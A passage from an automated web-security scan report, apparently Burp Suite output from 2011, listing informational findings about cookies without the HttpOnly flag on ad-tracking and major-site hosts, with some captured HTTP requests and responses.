T7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KANnJFP8%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.38. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

aud=ABR4nGNgYGDwU32xg4GB0dBFVGAjgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfWJFUEc8R7M4%2F0D5rFKgSnBrxCVOyHamSG8XRCX7YFo74QI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjMFOKjA5DAWgVxiz%2FEIi8gAQDkJzN5; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rc7%2Fm88kc3AwGjoIiqwESTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIBZPqLDEJScq%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacu%2B%2F4xAgbNAGiQp%2Bf8%2FUDWQoRR2JpsFKL63CaxbsoEBJM9oAaRB6r9A%2BIEqTsxwRYyWqJJae0xxS6ZVBYCMh3Cg1mIYH3amArcJMv%2BP4JM8TYzro3GbEHamAOZABpwO9N9VQNgarT0KuK0R%2FN7GDLcGXTJQJYaw8bJmFzlAiprBIakEpIGScJPA0Y%2BmCUgzcVycBuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwAGuycR; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.39. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 13-Jul-2012 18:37:29 GMT; Path=/
pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; Domain=.contextweb.com; Expires=Wed, 18-Jul-2012 18:37:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.40. http://bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_HOP=I=1&TS=1311085458; domain=bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; SRCHD=MS=1848248&SM=1&D=1769857&AF=BMMENO; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1311085458; domain=bing.com; path=/
Date: Tue, 19 Jul 2011 14:24:17 GMT

14.41. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.42. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ug=rBXKI63Fi2POmD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 21:00:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.43. http://c.atdmt.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.atdmt.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Sat, 04-Feb-2012 14:24:23 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.44. http://c.bing.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.bing.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 14:24:20 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.45. http://c.microsoft.com/trans_pixel.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.microsoft.com
Path:	/trans_pixel.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:58:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.46. http://cdnt.meteorsolutions.com/api/setid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/setid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.47. http://cdnt.meteorsolutions.com/api/track previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/track

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/
uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

14.48. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/213439054/340524297/direct/01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ach00=ceda/2b295:66c2/2b7b2:8bff/2a019; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e:cb8d24e/2a019/144bfd09/8bff/4e25ecbb; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.49. http://clk.specificclick.net/click/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.specificclick.net
Path:	/click/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ug=WPTUOuwXp9NyRD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 20:44:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.50. http://d.agkn.com/pixel!t=650! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.agkn.com
Path:	/pixel!t=650!

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uuid=636735553077172289; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 17-Jul-2016 20:44:49 GMT; Path=/
u=6|0BAgVuKlBAAAgAAMBACcCAtPdRgLT2IYBAlB9AeUAAAAAA%2BwqwQAAAAACjaJKAAAAAA58t90BagIABDCfAAQwtAA%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 18-Jul-2013 20:44:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.51. http://de.ign.com/js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.ign.com
Path:	/js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a016c05-17584-1686947025-5; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix)
AdServer: deserver25.in.snowball.com:9678:4
P3P: policyref="http://adserver.ign.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi PSAa PSDa IVAa IVDa CONi OUR SAMa UNRa PUBi OTRa IND UNI PUR COM NAV PRE"
Pragma: no-cache
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Tue, 19 Jul 2011 16:02:27 GMT
Date: Tue, 19 Jul 2011 16:02:27 GMT
Content-Length: 1152
Connection: close
Set-Cookie: NGUserID=a016c05-17584-1686947025-5; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

document.write('\n\n\n<a target=\"_blank\" href=\"http://de.ign.com/event.ng/Type=click&FlightID=165328&AdID=192829&TargetID=30097&Targets=2903
...[SNIP]...

14.52. http://ehg-aaa.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-aaa.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WSS_GW=V1z%X%%%rBB@^; path=/; domain=.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
CTG=1311102280; path=/; domain=.hitbox.com; expires=Tue, 26-Jul-2011 19:04:40 GMT; max-age=604800
DM550120M4NDV6=V1r@(#X"rz%X%%%rBB@^eer%@ez%zrz%"%X%%%rBB@^z%X%%%rBB@^"%X%%%rBBir"%X%%%rBB@^eer%@e"%z(xB$aTxB[TTaxB$YIWaFxB$O:maxB(IFGKz7}z)OuKr6%rrzA6aT"TTa6YIWaF6O:ma|IFGK; path=/; domain=ehg-aaa.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.53. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; Domain=invitemedia.com; expires=Wed, 18-Jul-2012 14:28:38 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.54. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=22048e84020100ee||t=1311087492|et=730|cs=002213fd4810efdd35c9315ece; expires=Thu, 18-Jul-2013 14:58:12 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:58:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: id=22048e84020100ee||t=1311087492|et=730|cs=002213fd4810efdd35c9315ece; expires=Thu, 18-Jul-2013 14:58:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

14.55. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

test_cookie=CheckForPermission; expires=Tue, 19-Jul-2011 15:12:18 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:57:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 19-Jul-2011 15:12:18 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

14.56. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686170_0.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homepage.mac.com
Path:	/jstg674/Sites/iSale/Pictures/1310686170_0.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mmr=nk11r10; Domain=homepage.mac.com; Path=/jstg674

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jstg674/Sites/iSale/Pictures/1310686170_0.jpg HTTP/1.1
Host: homepage.mac.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: AppleIDiskServer.1G301009
x-responding-server: hpng010-0
X-dmUser: jstg674
Cache-Control: max-age=60, must-revalidate
ETag: "c-1g3s18hn-1bnp-chfykqkp1-27t4kczenv0"
Last-Modified: Thu, 14 Jul 2011 23:29:38 GMT
Content-Type: image/jpeg
Content-Length: 149590
Date: Tue, 19 Jul 2011 18:35:31 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/jstg674

......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........#.$acspAPPL...................................-appl................................................desc...P...bdscm........cprt..
...[SNIP]...

14.57. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686178_1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homepage.mac.com
Path:	/jstg674/Sites/iSale/Pictures/1310686178_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mmr=nk11r10; Domain=homepage.mac.com; Path=/jstg674

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jstg674/Sites/iSale/Pictures/1310686178_1.jpg HTTP/1.1
Host: homepage.mac.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: AppleIDiskServer.1G301009
x-responding-server: hpng014-0
X-dmUser: jstg674
Cache-Control: max-age=60, must-revalidate
ETag: "c-1g3s18hn-1vdp-chfykqkp1-27t4kczenv0"
Last-Modified: Thu, 14 Jul 2011 23:29:44 GMT
Content-Type: image/jpeg
Content-Length: 193128
Date: Tue, 19 Jul 2011 18:35:31 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/jstg674

......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........#.$acspAPPL...................................-appl................................................desc...P...bdscm........cprt..
...[SNIP]...

14.58. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330; domain=.interclick.com; expires=Mon, 19-Jul-2021 15:16:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.59. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; domain=pubmatic.com; expires=Thu, 17-Jul-2014 19:10:42 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.60. http://images.apple.com/global/nav/scripts/globalnav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/scripts/globalnav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=eKwIcPZgJHsw/8hbkWk9NfbHjaEfvezhpVDm9O8an1EjF8hLQjxhpUGXNk+TIL7iWWOIrci6QZbyox1vAlXFVihrt8rDm2O1C6WZLWbAaeFfFc7jmCkxXgIJaupEJRaY6NgELLxXeKF6EFrxpC7vR5zyxY1a4A3pO+U0y8n9QBs3xRZfEwZgN9+DCPhXS98jOpRP7LpdSOv2oPnk8imbvq0cQipmLUkqb4k/+DxDtbStL1gFEy4RIwc2KInyZBbJTTULrcNK344YNZQOBNahULD1xr0ZcBZuhC5lRSS+hbELGgk0olyljSa4egdnMaJfinm6RL25YdaJ0dnV06Zyy+AHGuS35bhCQUMkT6XaneeJ/deVwipi4jmBu0ZUjOukjt15yG/+Z/DVtLPltA7trg0BnR+smGw+vCc1PTuMBLhsnRKdF9q7TVZPFLMsXPy7DRG/9FOpNiW6ByUXJh8RgVGxqTBDP8GgLVcbjQDZ/IlZJXnQOajXAhKlz9efbW//nt1FnB+h0mxLTQ1q+LO/zePTWbXI3IlzV1FTThIKOC19AyDmCBQUmUkMEDKnmJ8E; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.61. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=QdtF1drqHnVlSB+HwBLvnZMiEH6obQO+cu9Z/v2U4XKn7rs0v9NnOT8WpKGzWszZlmje/F2XWEPjpKcWLnxgaqw4+z0GeGzRkZ9NOc/XiCNPPBXvTsfWU/g93BDPgA5zkECn2p9RSPgnJEs58xCAf8Cyl5p8pL4q0s5Aprv3Hs42UW70Bq0TWB0AbW4MKqf0HabQXZ+JvBhnCX2ORQFO2SJmDWUxjUkeeXAtgAUN5hIVdywMaWSem8rwn+z7IrWlTS/hxGAGzAZE8P/DWcNTgVmHWuZYsNMed65Ys0NGnEexIGgeNdPrLu2Mqi1suK7HER0VT6wkB9Kwf1Cz4qdD2Y6ZyKYHSnAYTn0P4ENkkZnV0fK7QYR5TLqAMO21fhZjuKqoVUVyYY6Qa4AUEikaRwSSGj0PQn0LhG7Waf8R398H2av/rJYZxvilwDxaDMZY2Y2ok/AFZpf0uBMPk9+1hKXcD6060vM7LXdbkrcPWkzwdvbpK+RHINHLtSVt6HMqGCAdX4NakPCikSyRX6v1+sF3E8CWlp5sb00mun82sVBkihULVVRPk9DdFPGZhes2; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.62. http://images.apple.com/global/scripts/apple_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=m9/CPkw5LYIvCVzI84KswFfsTPWQTIJawwQIZs9o2PB0TBT1ovgy3ln6NmgFVXWxe28ZkpzYNgIOieP+3eWkJAxVytLayQ1tfgMcX6DRdUmAnmimWKGqd1xzwenJEayZwv7uxmhSF3CLrp93uSRC4YAAo8gcHB6esH9FOaxBi4Flva6z29KPIxWB7aWVfwK2AKRb4ZCDECK/uY3+TvkeJeYH5GbI/qWQEudByrxnPrDLhuhhyWCvk+8ARqzhXx5rlLcRqDZbVkEN6MgXCE6VIleRIOzVcf8J9TlQ/WwKlsu3VInW+sFCFQcJve8SUEbn+2GSz2o4ZnWqP0VnTvJAfyRsLxqbEMtCt29XklyX2RYPUMNix5b/oCM/cW4vKZfJT1Y9vGXe0Fjvva6FucMUCdROvPiCeFfQKEQv6GlbBv6I58Od4d6gv9Qh9/PMPhmzbNRdfR+EREc/ZOaKdVdHWAQB6kgbzc+xtEev6d2e5xvlYpQO/MuQLYnWwIRc3zu7hyz4n2T+tx27XrIVxumLBYm7MT7koJZi7SrwP50EfcHb+NaXkzPal8ObUbigg59I; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.63. http://images.apple.com/global/scripts/browserdetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

